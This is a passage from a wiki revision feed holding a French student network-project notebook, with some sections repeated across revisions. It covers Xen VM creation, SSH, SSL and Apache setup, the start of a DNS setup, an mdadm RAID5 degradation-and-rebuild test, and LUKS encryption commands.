                  'phy:/dev/virtual/banane-2,xvde,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-3,xvdf,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On reconfigure le fichier IMA5-BANANE.cfg en créant 3 nouvelles partitions LVM banane-X de 1 Go associées à notre VM.&lt;br /&gt;
&lt;br /&gt;
    2) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On relance la MV IMA5-BANANE.&lt;br /&gt;
&lt;br /&gt;
    3) apt-get install mdadm&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite installé l paquetage mdadm puis rebooté la MV.&lt;br /&gt;
&lt;br /&gt;
    4) mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
Nous créons le volume /dev/md0 pour créer un RAID5 logiciel avec les trois partitions obtenues.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
arrêtez la machine virtuelle, retirez lui une des trois partitions, relancez la. Essayez de remonter votre RAID5, que constatez-vous ? &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    5) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 17:03:20 2017&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
 Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 2&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    6) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 18:51:56 2017&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
 Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 12&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
 On copie des données sur le RAID5.&lt;br /&gt;
&lt;br /&gt;
    7) root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.7% (627140/1047552) finish=0.2min speed=28506K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [============&amp;gt;........]  recovery = 64.5% (676392/1047552) finish=0.2min speed=29408K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.2% (695080/1047552) finish=0.2min speed=28961K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 68.1% (714664/1047552) finish=0.1min speed=28586K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.6% (991996/1047552) finish=0.0min speed=29206K/sec   &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Cryptage des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
 cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
 cryptsetup luksOpen /dev/sdb1 crypt_sd&lt;br /&gt;
 mkfs.ext4 /dev/mapper/crypt_sd&lt;br /&gt;
 mount /dev/mapper/crypt_sd /mnt&lt;br /&gt;
 vi /mnt/test.txt #on marque un texte dans le fichier&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose crypt_sd&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en réseau de la MV Xen IMA5-BANANE&amp;lt;/span&amp;gt;====&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46204</id>
		<title>Cahier 2017 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46204"/>
				<updated>2017-11-13T10:46:15Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Certification SSL */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Présentation générale'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en contexte&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
Le projet de Réseau Avancé est composé d'une partie commune et d'une tâche particulière par binôme. Ce projet consiste en la configuration d'une architecture réseau avec différentes parties, en plus du câblage et de la configuration des routeurs et commutateurs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La partie commune consiste en la création et la mise en réseau d'une machine virtuelle; ainsi que la création d'un site sécurisé avec la configuration du serveur SSH, DNS sécurisé et du certificat SSL. La virtualisation permet de faire fonctionner sur une même machine plusieurs OS isolés ou des logiciels grâce aux machines virtuelles. Au-delà de la réduction des coûts, la virtualisation permet aussi de manipuler et gérer plus facilement des OS. Cependant, on s'oriente de plus en plus vers l'isolation par des conteneurs car ils permettent au sein d'un même OS, d'isoler les ressources matérielles et d'éviter des surcharges.&lt;br /&gt;
&lt;br /&gt;
Notre tâche particulière est donc de réaliser la gestion des conteneurs au sein d'une machine virtuelle configurée en réseau.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Tâches à effectuer&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
* Création d'une machine virtuelle sur le serveur de virtualisation Cordouan&lt;br /&gt;
* Mettre la machine virtuelle en réseau&lt;br /&gt;
* Configuration des services Internet (Serveur SSH, DNS, DNSSEC, Certificat SSL)&lt;br /&gt;
* Crackage de clé Wi-Fi&lt;br /&gt;
* Créer les différents conteneurs et configurer leur accès au réseau (tâche particulière)&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Travail effectué'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
                     &lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Création d'une machine virtuelle Xen sur Cordouan&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On commence par créer une machine virtuelle Xen sur le serveur de virtualisation cordouan.insecserv.deule.net. On se connecte tout d'abord en SSH sur le serveur cordouan.&lt;br /&gt;
&lt;br /&gt;
    1) ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
       Mot de passe: mot de passe root habituel&lt;br /&gt;
&lt;br /&gt;
On précise:&lt;br /&gt;
&lt;br /&gt;
* le nom de machine virtuelle: IMA5-BANANE&lt;br /&gt;
* son adresse IP sur le réseau: 193.48.57.179/28&lt;br /&gt;
* le répertoire où créer les disques virtuels: /usr/local/xen&lt;br /&gt;
* le miroir Debian: http://debian.polytech-lille.fr/debian&lt;br /&gt;
* la distribution: jessie (qui est la distribution stable courante)&lt;br /&gt;
&lt;br /&gt;
    2) xen-create-image --hostname=&amp;lt;IMA5-BANANE&amp;gt; --ip 193.48.57.179/28 --dir /usr/local/xen --netmask=255.255.255.240 --gateway=193.48.57.177 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte. Installez les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind (voir la partie services).&lt;br /&gt;
&lt;br /&gt;
    3) xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-home -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-var -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration en faisant en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&lt;br /&gt;
* la mémoire attribuée: 512 Mo&lt;br /&gt;
* l'adresse ip de la MV: 193.48.57.179/28&lt;br /&gt;
* bridge: IMA5sc&lt;br /&gt;
&lt;br /&gt;
    4) xl list&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# xl list&lt;br /&gt;
       Name                                        ID   Mem VCPUs	State	Time(s)&lt;br /&gt;
       Domain-0                                     0  1993     8     r-----   52219.3&lt;br /&gt;
       karmeliett                                   1   128     1     -b----    2483.6&lt;br /&gt;
       duvel                                        2   512     1     -b----    4225.6&lt;br /&gt;
       deus                                         3   512     1     -b----    4226.4&lt;br /&gt;
       trappe                                       4   512     1     -b----    4082.4&lt;br /&gt;
       Rincecochon                                  6   512     1     -b----    3788.2&lt;br /&gt;
       IMA5-Durian                                 62   512     1     -b----    3237.7&lt;br /&gt;
       IMA5-BANANE                                 84   512     1     -b----     152.9&lt;br /&gt;
       IMA5-Papaye                                 89   512     1     -b----      35.4&lt;br /&gt;
       IMA5-Ananas                                 91   512     1     -b----      27.0&lt;br /&gt;
&lt;br /&gt;
On vérifie que la MV IMA5-BANANE a bien été créée.&lt;br /&gt;
&lt;br /&gt;
    5) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On lance IMA5-BANANE en utilisant le log root et le mot de passe configuré.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Services Internet (SSH, DNS sécurisé et certificat SSL)&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On configure à présent les services Internet après avoir acheté un nom de domaine (https://www.banane.space) sur gandi.net pour créer notre site Web sécurisé.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur SSH''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle, nous avons configuré le fichier sshd_config (PubkeyAuthentication ) :&lt;br /&gt;
&lt;br /&gt;
       root@IMA5-BANANE:~# vim /etc/ssh/sshd_config&lt;br /&gt;
       &lt;br /&gt;
       RSAAuthentication yes&lt;br /&gt;
       PubkeyAuthentication yes&lt;br /&gt;
       #AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
       PermitRootLogin yes&lt;br /&gt;
       &lt;br /&gt;
       root@IMA5-BANANE:~# service ssh restart&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Certification SSL''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Premièrement, sur Gandi nous lançons l'étape d'achat d'un certificat SSL. Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout banane.key -out banane.csr&lt;br /&gt;
 Generating a 2048 bit RSA private key&lt;br /&gt;
 If you enter '.', the field will be left blank.&lt;br /&gt;
 -----&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:banane.space&lt;br /&gt;
 Email Address []:&lt;br /&gt;
 A challenge password []:&lt;br /&gt;
 An optional company name []:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# ls banane.csr banane.key&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# cat banane.csr&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
 &amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
 -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Nous continuons donc la procédure pour obtenir le certificat, et attendons donc sa mise en place.&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# apt-get install postfix mailx&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp certificat.crt /etc/ssl/certs/banane.space.crt&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp serveur.key /etc/ssl/private/banane.space.key&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-banane.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available# cat 000-banane.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.banane.space&lt;br /&gt;
         ServerAlias banane.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
   &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/banane.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/banane.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# cat ports.conf &lt;br /&gt;
 Listen 80&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
	 Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
	Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 stop&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 start&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 reload&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre site est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur DNS''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
On commence par modifier les informations de notre nom de domaine sur le site de Gandi. Ensuite, dans ''&amp;quot;Gérer les Glue Records&amp;quot;'', nous modifions les informations concernant notre nom de domaine.&lt;br /&gt;
&lt;br /&gt;
* nom du serveur: ns.banane.space&lt;br /&gt;
* adresse IP: 193.48.57.179&lt;br /&gt;
* serveurs de nom:&lt;br /&gt;
** DNS1: ns.banane.space&lt;br /&gt;
** DNS2: ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier /etc/bind de notre machine virtuelle.&lt;br /&gt;
Nous modifions dans un premier temps le fichier named.conf.local afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Sécurisation des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    1) vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-1 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-2 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-3 -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-1,xvdd,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-2,xvde,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-3,xvdf,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On reconfigure le fichier IMA5-BANANE.cfg en créant 3 nouvelles partitions LVM banane-X de 1 Go associées à notre VM.&lt;br /&gt;
&lt;br /&gt;
    2) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On relance la MV IMA5-BANANE.&lt;br /&gt;
&lt;br /&gt;
    3) apt-get install mdadm&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite installé l paquetage mdadm puis rebooté la MV.&lt;br /&gt;
&lt;br /&gt;
    4) mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
Nous créons le volume /dev/md0 pour créer un RAID5 logiciel avec les trois partitions obtenues.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
arrêtez la machine virtuelle, retirez lui une des trois partitions, relancez la. Essayez de remonter votre RAID5, que constatez-vous ? &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    5) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 17:03:20 2017&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
 Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 2&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    6) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 18:51:56 2017&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
 Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 12&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
 On copie des données sur le RAID5.&lt;br /&gt;
&lt;br /&gt;
    7) root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.7% (627140/1047552) finish=0.2min speed=28506K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
